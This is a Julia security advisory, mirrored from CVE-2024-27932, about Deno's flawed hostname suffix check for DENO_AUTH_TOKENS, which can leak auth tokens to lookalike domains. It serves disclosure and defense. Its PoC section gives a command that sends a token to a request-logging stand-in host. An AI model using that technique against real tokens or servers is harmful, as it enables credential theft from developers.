JLSEC-2026-104

See a problem?
Please try reporting it to the source first.

Source

https://github.com/JuliaLang/SecurityAdvisories.jl/blob/main/advisories/published/2026/JLSEC-2026-104.md

Import Source

https://github.com/JuliaLang/SecurityAdvisories.jl/tree/generated/osv/2026/JLSEC-2026-104.json

JSON Data

https://api.osv.dev/v1/vulns/JLSEC-2026-104

Upstream

CVE-2024-27932

EUVD-2024-0827

GHSA-5frw-4rwq-xhcr

Published

2026-04-14T13:10:46.494Z

Modified

2026-04-14T13:31:34.551843992Z

Severity

4.6 (Medium) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N CVSS Calculator

Summary

Deno's improper suffix match testing for DENO_AUTH_TOKENS

Details

Summary

Deno improperly checks that an import specifier's hostname is equal to or a child of a token's hostname, which can cause tokens to be sent to servers they shouldn't be sent to. An auth token intended for example.com may be sent to notexample.com.

Details

authtokens.rs uses a simple endswith check, which matches www.deno.land to a deno.land token as intended, but also matches im-in-ur-servers-attacking-ur-deno.land to deno.land tokens.

PoC

Set up a server that logs requests. RequestBin will do. For example, denovulnpoc.example.com.
Run DENO_AUTH_TOKENS=a1b2c3d4e5f6@left-truncated.domain deno run https://not-a-left-truncated.domain. For example, DENO_AUTH_TOKENS=a1b2c3d4e5f6@poc.example.com deno run https://denovulnpoc.example.com
Observe that the token intended only for the truncated domain is sent to the full domain

Impact

What kind of vulnerability is it? Who is impacted? Anyone who uses DENOAUTHTOKENS and imports potentially untrusted code is affected.

Database specific

{
    "sources": [
        {
            "html_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27932",
            "id": "CVE-2024-27932",
            "modified": "2025-01-03T19:19:52.197Z",
            "published": "2024-03-21T02:52:21.953Z",
            "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2024-27932",
            "imported": "2026-04-14T12:58:55.024Z"
        },
        {
            "html_url": "https://github.com/advisories/GHSA-5frw-4rwq-xhcr",
            "id": "GHSA-5frw-4rwq-xhcr",
            "modified": "2024-03-21T18:25:43Z",
            "published": "2024-03-06T17:03:36Z",
            "url": "https://api.github.com/advisories/GHSA-5frw-4rwq-xhcr",
            "imported": "2026-04-14T12:58:59.425Z"
        },
        {
            "html_url": "https://euvd.enisa.europa.eu/vulnerability/EUVD-2024-0827",
            "id": "EUVD-2024-0827",
            "modified": "2024-08-05T16:59:34Z",
            "published": "2024-03-06T20:45:16Z",
            "url": "https://euvdservices.enisa.europa.eu/api/enisaid?id=EUVD-2024-0827",
            "imported": "2026-04-14T12:58:57.176Z"
        }
    ],
    "license": "CC-BY-4.0"
}

References

Credits

- easrng - REPORTER
- - https://github.com/easrng
- mmastrac - REMEDIATION_DEVELOPER
- - https://github.com/mmastrac

Affected packages

Julia / Deno_jll

Package

Name: Deno_jll
Purl: pkg:julia/Deno_jll?uuid=04572ae6-984a-583e-9378-9577a1c2574d

Affected ranges

Type: SEMVER
Events: Introduced

0Unknown introduced version / All previous versions are affected

Fixed

2.0.0+0

Database specific

source

"https://github.com/JuliaLang/SecurityAdvisories.jl/tree/generated/osv/2026/JLSEC-2026-104.json"